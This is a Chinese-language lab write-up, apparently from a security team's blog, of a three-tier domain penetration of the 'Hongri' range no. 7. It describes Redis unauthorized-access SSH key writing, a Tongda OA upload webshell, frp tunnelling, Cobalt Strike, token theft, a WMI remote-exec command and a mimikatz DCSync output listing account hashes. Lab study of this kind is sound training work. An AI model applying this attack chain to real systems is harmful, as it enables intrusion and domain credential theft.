红日靶场（七）WHOAMI Penetration（一）

原创 Undefin3d团队 Undefin3d安全团队 2024-11-18 12:45

·

DMZ IP段为192.168.1.0/24

·

二层网络 IP段为192.168.52.0/24

·

三层网络 IP段为192.168.93.0/24

第一层网络

首先我们拿到靶机的ip为192.168.1.128，我们直接可以fscan进行端口扫描，发现了一个redis授权漏洞和一个Laravel的cve漏洞

我们直接通过redis未授权写ssh密钥，拿到主机的shell

然后我们直接viper上新建监听，然后一句话上线viper

直接在靶机上运行就可以上线viper

第二层网络

然后我们添加内网路由，查看主机的ip

发现存在内网192.168.52.0/24段的网络，我们上次fscan进行内网扫描，发现了一个通达oa

我们先将通达的端口给转发到本地，然后进行访问

我们使用通达oa的工具进行测试发现一个文件上传的漏洞，我们直接传入🐎上线蚁剑

然后我们通过蚁剑上传我们viper的🐎，就可以上线了

然后添加路由，但是我们发现上传的fscan没法运行，然后又是一台windows的系统，我们直接转cs上线，但是cs上线需要把我们的本地的端口转发到靶机里面，这样我们就可以监听到pc了，我们frp进行内网穿透，我们将第一台靶机设为我们的服务端，本地为客户端，这样就可以了

第一台靶机

本地kali

发现可以连通

我们可以进行测试，在本机监听8008端口，然后在靶机上去访问nc 127.0.0.1 8008，发现可以了

然后我们就可以开启cs的去监听8008端口，viper直接已将转cs，就可以上线cs了

第三层网络

上线cs后我们进行端口的扫描，我们发现93段的ip，我们直接进行探测，然后发现DC的ip是192.168.93.30，和pc2的ip

然后通过 shell ipconfig /displaydns 来查看域名

然后我们查看进程，会发现有域管的进程，我们可以进行令牌的窃取

然后我们进行通过域管的权限去运行我们的🐎就可以上线域管的监听了

remote-exec wmi 192.168.52.30 C:\MYOA\webroot\sh3.exe

然后我们尝试导出域内所有用户的hash值，发现可以导出，然后我们就可以用DCsync攻击就可以

[*] Tasked beacon to run mimikatz’s lsadump::dcsync /domain:WHOAMIANONY.org /all /csv command            [+] host called home, sent: 787057 bytes            [+] received output:            [DC] ‘WHOAMIANONY.org’ will be the domain            [DC] ‘DC.whoamianony.org’ will be the DC server            [DC] Exporting domain ‘WHOAMIANONY.org’            [rpc] Service
  : ldap            [rpc] AuthnSvc : GSS_NEGOTIATE (9)            502
    krbtgt
    6be58bfcc0a164af2408d1d3bd313c2a
    514            1001
    whoami
    ab89b1295e69d353dd7614c7a3a80cec
    66048            1115
    moretz
    ba6723567ac2ca8993b098224ac27d90
    66048            1002
    DC$
    202d13c79f52cc1d49870638e854afad
    532480            1112
    bunny
    cc567d5556030b7356ee4915ff098c8f
    66048            500
    Administrator
    ab89b1295e69d353dd7614c7a3a80cec
    66048            1113
    PC2$
    65e034039585f728c8f15fe3f3b814ed
    4096            

然后我们进行上🐎，直接上线dc，同样操作上线pc2